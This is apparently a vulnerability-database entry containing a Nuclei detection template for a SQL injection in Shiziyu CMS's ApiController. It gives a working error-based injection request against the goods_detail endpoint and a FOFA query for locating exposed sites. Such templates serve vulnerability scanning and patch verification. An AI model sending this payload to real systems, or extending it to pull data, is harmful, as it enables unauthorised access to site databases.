漏洞描述
Shiziyu CMS ApiController.class.php parameter filtering is not rigorous, resulting in SQL injection vulnerability.
shiziyu-cms-apicontroller-sqli: Shiziyu CMS Api Controller - SQL Injection
PoC代码[已公开]
id: shiziyu-cms-apicontroller-sqli
info:
name: Shiziyu CMS Api Controller - SQL Injection
author: SleepingBag945
severity: high
description: |
Shiziyu CMS ApiController.class.php parameter filtering is not rigorous, resulting in SQL injection vulnerability.
metadata:
verified: true
max-request: 1
fofa-query: body="/seller.php?s=/Public/login"
tags: sqli,vuln
variables:
num: "999999999"
http:
- method: GET
path:
- "{{BaseURL}}/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{num}}),0x7e),1)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'c8c605999f3d8352d7bb792cf3fdb25'
- type: status
status:
- 404
# digest: 490a0046304402204087668d5de65b08569a6bec9c58c3751ed063f7f83830b94a8d9f78fda24048022027a0d790022a8a715712e4156e2ac5f6fa3c89445728f3002496e19a9105591c:922c64590222798bb761d5b6d8e72950